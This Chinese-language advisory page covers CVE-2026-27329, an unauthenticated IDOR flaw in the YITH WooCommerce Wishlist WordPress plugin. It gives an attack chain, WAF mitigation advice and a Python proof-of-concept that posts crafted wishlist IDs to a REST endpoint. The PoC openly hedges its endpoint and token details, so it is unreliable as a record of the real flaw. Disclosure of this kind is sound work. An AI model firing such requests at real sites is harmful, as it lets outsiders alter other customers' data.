CVE-2026-27329 CVSS 5.3 中危

CVE-2026-27329 YITH WooCommerce Wishlist 访问控制绕过漏洞

披露日期: 2026-05-07

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-27329

漏洞类型

访问控制绕过 (IDOR)

CVSS评分

5.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

YITH WooCommerce Wishlist

漏洞概述

YITH WooCommerce Wishlist插件存在一个通过用户控制密钥导致的授权绕过漏洞。攻击者无需认证即可利用配置错误的访问控制安全级别。该漏洞影响了从n/a到4.12.0的版本，可能导致未授权用户修改或访问受限制的资源，影响系统完整性。

技术细节

该漏洞属于不安全的直接对象引用（IDOR）或访问控制绕过。在受影响版本的YITH WooCommerce Wishlist插件中，某些敏感端点未正确验证请求者的权限，而是依赖客户端可控的参数（如ID或密钥）来决定访问权限。由于CVSS向量显示无需用户交互（UI:N）且无需认证（PR:N），攻击者可以通过构造特定的HTTP请求，直接操作目标对象（如愿望列表）。攻击者利用此漏洞可以遍历ID或修改请求参数中的键值，从而执行未授权的操作，如添加、删除或修改其他用户的愿望列表数据，导致数据完整性受损。

攻击链分析

STEP 1

1. 信息收集

识别使用YITH WooCommerce Wishlist插件的WordPress网站，并确定其版本号在4.12.0及以下。

STEP 2

2. 漏洞探测

分析插件API端点，寻找存在访问控制缺陷的接口，特别是可以通过参数直接控制对象ID或密钥的接口。

STEP 3

3. 构造攻击请求

攻击者无需登录，直接构造包含目标用户Wishlist ID或Token的HTTP POST/GET请求。

STEP 4

4. 执行未授权操作

发送请求至服务器，由于服务器端未正确校验权限，攻击者成功修改、添加或删除目标Wishlist中的数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# PoC for CVE-2026-27329: Authorization Bypass in YITH WooCommerce Wishlist
# This script demonstrates unauthorized modification of a wishlist via IDOR.

import requests

def exploit(target_url, wishlist_id, product_id):
    """
    Attempts to add a product to a specific wishlist without authentication.
    """
    # The vulnerable endpoint usually accepts a wishlist token or ID directly
    endpoint = f"{target_url}/wp-json/yith-wcwl/v1/add-to-wishlist"
    
    headers = {
        "User-Agent": "CVE-2026-27329-Scanner",
        "Content-Type": "application/json"
    }
    
    # Payload exploiting the user-controlled key/id
    payload = {
        "product_id": product_id,
        "wishlist_id": wishlist_id,  # User-controlled key leading to IDOR
        "wishlist_token": "arbitrary_token" # Depending on specific implementation
    }

    try:
        response = requests.post(endpoint, json=payload, headers=headers, timeout=10)
        if response.status_code == 200 or response.status_code == 201:
            print(f"[+] Success! Item added to wishlist {wishlist_id} without auth.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Failed. Status Code: {response.status_code}")
            print(f"[-] Response: {response.text}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    # Replace with actual target details
    target = "http://example.com"
    target_wishlist_id = "12345"
    target_product_id = "67890"
    exploit(target, target_wishlist_id, target_product_id)

影响范围

YITH WooCommerce Wishlist <= 4.12.0

防御指南

临时缓解措施

如果无法立即升级，建议通过Web应用防火墙（WAF）配置规则，拦截对受影响API端点的异常请求，特别是那些包含可疑ID或Token参数的请求。同时，可暂时禁用该插件的公开访问功能，直到完成修复。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表